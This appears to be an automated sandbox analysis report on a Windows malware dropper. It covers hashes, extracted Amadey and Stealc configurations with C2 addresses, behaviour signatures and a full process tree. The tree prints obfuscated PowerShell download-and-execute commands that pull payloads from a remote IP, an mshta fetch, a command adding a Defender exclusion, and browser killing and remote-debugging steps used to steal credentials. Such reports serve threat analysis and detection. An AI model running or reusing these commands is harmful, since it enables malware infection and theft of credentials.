Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:10

General

  • Target

    file.exe

  • Size

    1.8MB

  • MD5

    873f4ff6922f79aca237323377183153

  • SHA1

    c0e782ab9058afb71626fae94fdd996cbeda934a

  • SHA256

    bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271

  • SHA512

    7fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8

  • SSDEEP

    49152:Kpe2Nf+D/CmuxmmCTHmn0sPx6rvwEyw1lkpR4Yk4Pbdt50O:R21ya98mYUPoroVslWuLebdb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:772
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Users\Admin\AppData\Local\Temp\1007999001\f3b0fd921b.exe
        "C:\Users\Admin\AppData\Local\Temp\1007999001\f3b0fd921b.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1572
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:4028
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ee9758,0x7fef6ee9768,0x7fef6ee9778
            5⤵
              PID:1028
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              5⤵
                PID:848
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1080 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:2
                5⤵
                  PID:3912
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1384 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:8
                  5⤵
                    PID:304
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1488 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:8
                    5⤵
                      PID:532
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2304 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1608
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:3808
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2008 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:2
                      5⤵
                        PID:2404
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2296 --field-trial-handle=1356,i,3705708799486930299,9449837409268699205,131072 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:804
                  • C:\Users\Admin\AppData\Local\Temp\1008000001\25accdd771.exe
                    "C:\Users\Admin\AppData\Local\Temp\1008000001\25accdd771.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1760
                  • C:\Users\Admin\AppData\Local\Temp\1008001001\c3295f84bf.exe
                    "C:\Users\Admin\AppData\Local\Temp\1008001001\c3295f84bf.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:836
                  • C:\Users\Admin\AppData\Local\Temp\1008002001\f0ba62d99a.exe
                    "C:\Users\Admin\AppData\Local\Temp\1008002001\f0ba62d99a.exe"
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:928
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM firefox.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2224
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM chrome.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1480
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM msedge.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1496
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM opera.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2192
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM brave.exe /T
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2984
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2808
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        5⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of WriteProcessMemory
                        PID:2444
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.0.791444459\503857101" -parentBuildID 20221007134813 -prefsHandle 1072 -prefMapHandle 1200 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33c01b1e-37ba-4c3d-81d5-876d29d39fed} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 1308 112d8a58 gpu
                          6⤵
                            PID:2924
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.1.1395630463\1284821792" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {653fe318-ec34-449c-8efd-0b93d08a157f} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 1516 e74e58 socket
                            6⤵
                              PID:1708
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.2.1498067634\811873974" -childID 1 -isForBrowser -prefsHandle 1932 -prefMapHandle 2272 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6884c4d3-7038-4ae9-a504-4cb870c592d5} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 1852 19cdff58 tab
                              6⤵
                                PID:680
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.3.1938653256\1833131981" -childID 2 -isForBrowser -prefsHandle 2620 -prefMapHandle 2596 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d44c303-8962-4354-ba9d-751422746623} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 2640 1c0dd858 tab
                                6⤵
                                  PID:1076
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.4.317108070\128066826" -childID 3 -isForBrowser -prefsHandle 3764 -prefMapHandle 3760 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f35040c-42d6-4285-b909-e54b41481039} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 3776 20093558 tab
                                  6⤵
                                    PID:3192
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.5.1529107627\482441841" -childID 4 -isForBrowser -prefsHandle 3884 -prefMapHandle 3888 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5106f778-1d81-49ac-a479-01c3e3faf001} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 3876 20093e58 tab
                                    6⤵
                                      PID:3200
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2444.6.993701330\547426790" -childID 5 -isForBrowser -prefsHandle 4044 -prefMapHandle 4048 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1776efd2-56fe-470e-b048-7fd3a512f154} 2444 "\\.\pipe\gecko-crash-server-pipe.2444" 4032 20093258 tab
                                      6⤵
                                        PID:3228
                                • C:\Users\Admin\AppData\Local\Temp\1008003001\e06dcd041b.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1008003001\e06dcd041b.exe"
                                  3⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2032
                                • C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:3912
                                  • C:\Users\Admin\AppData\Local\Temp\is-SP6OK.tmp\FunnyJellyfish.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-SP6OK.tmp\FunnyJellyfish.tmp" /SL5="$D0152,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:3952
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                      5⤵
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:4000
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 3
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Delays execution with timeout.exe
                                        PID:4028
                                      • C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:3116
                                        • C:\Users\Admin\AppData\Local\Temp\is-5PH9L.tmp\FunnyJellyfish.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-5PH9L.tmp\FunnyJellyfish.tmp" /SL5="$60120,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008004001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          PID:3084
                                          • C:\Windows\SysWOW64\regsvr32.exe
                                            "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                            8⤵
                                            • Loads dropped DLL
                                            • System Location Discovery: System Language Discovery
                                            PID:3224
                                            • C:\Windows\system32\regsvr32.exe
                                              /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                              9⤵
                                              • Loads dropped DLL
                                              PID:3312
                                • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:2428
                                  • C:\Windows\system32\wscript.exe
                                    "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                    4⤵
                                      PID:928
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                        5⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3684
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                          6⤵
                                            PID:3884
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                              7⤵
                                                PID:4012
                                                • C:\Windows\system32\mshta.exe
                                                  mshta http://176.113.115.178/Windows-Update
                                                  8⤵
                                                  • Blocklisted process makes network request
                                                  • Modifies Internet Explorer settings
                                                  PID:4044
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                    9⤵
                                                    • UAC bypass
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2276
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                      10⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1592
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                            5⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3700
                                            • C:\Windows\system32\ipconfig.exe
                                              "C:\Windows\system32\ipconfig.exe" /flushdns
                                              6⤵
                                              • Gathers network information
                                              PID:4020
                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                    1⤵
                                      PID:3772

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                      Filesize

                                      264KB

                                      MD5

                                      f50f89a0a91564d0b8a211f8921aa7de

                                      SHA1

                                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                                      SHA256

                                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                      SHA512

                                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000007.dbtmp

                                      Filesize

                                      16B

                                      MD5

                                      18e723571b00fb1694a3bad6c78e4054

                                      SHA1

                                      afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                      SHA256

                                      8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                      SHA512

                                      43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp

                                      Filesize

                                      23KB

                                      MD5

                                      c054b43a982ae2825126071f3e74a913

                                      SHA1

                                      0b878708b9ef45a5f6978ae975b53be9ba0c4309

                                      SHA256

                                      412b14cc275b737914dec7c46172ebbb0361e7d5d9d8b431c60636466d9bfb2e

                                      SHA512

                                      ded1675711f585d105699829e818bec3eb5a8521859214a2b42cd07bf6c9325cee7b6be18a8e31601820ff7332cb7e31f8546d5f6ebd7750caf4864108d25e8f

                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                      Filesize

                                      13KB

                                      MD5

                                      f99b4984bd93547ff4ab09d35b9ed6d5

                                      SHA1

                                      73bf4d313cb094bb6ead04460da9547106794007

                                      SHA256

                                      402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                                      SHA512

                                      cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                                    • C:\Users\Admin\AppData\Local\Temp\1007999001\f3b0fd921b.exe

                                      Filesize

                                      4.2MB

                                      MD5

                                      40cb4053a584486a21a109ffb44933c9

                                      SHA1

                                      07a94039a6176646ecdb0a5b0fab59b632bdbd18

                                      SHA256

                                      71b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84

                                      SHA512

                                      58356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3

                                    • C:\Users\Admin\AppData\Local\Temp\1008000001\25accdd771.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      6380b8ca2f9bfc1d86617a3a7fd924f1

                                      SHA1

                                      04ff7e660a59bd2c45098e99a3fd5bff614d2d57

                                      SHA256

                                      f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c

                                      SHA512

                                      8b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033

                                    • C:\Users\Admin\AppData\Local\Temp\1008001001\c3295f84bf.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      81380b3f4700458353f68405ba69f471

                                      SHA1

                                      2c51c11246200de63ac0121df7fc94545f0aef38

                                      SHA256

                                      5b039e26817ac3dde3340af44180e943e7823936cb537342e8a818e5d8705908

                                      SHA512

                                      a59cd918a59a2aef818e2974579026a1ab344bfe658e23954550b6c2d44df2285d5365cd60d4086c60d4234ed8616546826d9ed66634150f0d4fde8702e0ff3f

                                    • C:\Users\Admin\AppData\Local\Temp\1008002001\f0ba62d99a.exe

                                      Filesize

                                      901KB

                                      MD5

                                      7fa8aa5776c44304def2ed20c16d29ec

                                      SHA1

                                      0fc5106137c34600f7bbb963a6c73b3f4911f1a3

                                      SHA256

                                      69a5b88b0132f61fcd531761b93e11ee2d8a53228431b295c6827f314fd47dbd

                                      SHA512

                                      6eb521c820d034683a014f4fa998055c339114182512c3241330e5b8a43843b01c478cf8cb8d1e51b767c888da9fbcb8a7ee900287b1d359b7ead2ef6eeb2aa8

                                    • C:\Users\Admin\AppData\Local\Temp\1008003001\e06dcd041b.exe

                                      Filesize

                                      2.7MB

                                      MD5

                                      dd9ad82b68a13333652866431f0ee8d9

                                      SHA1

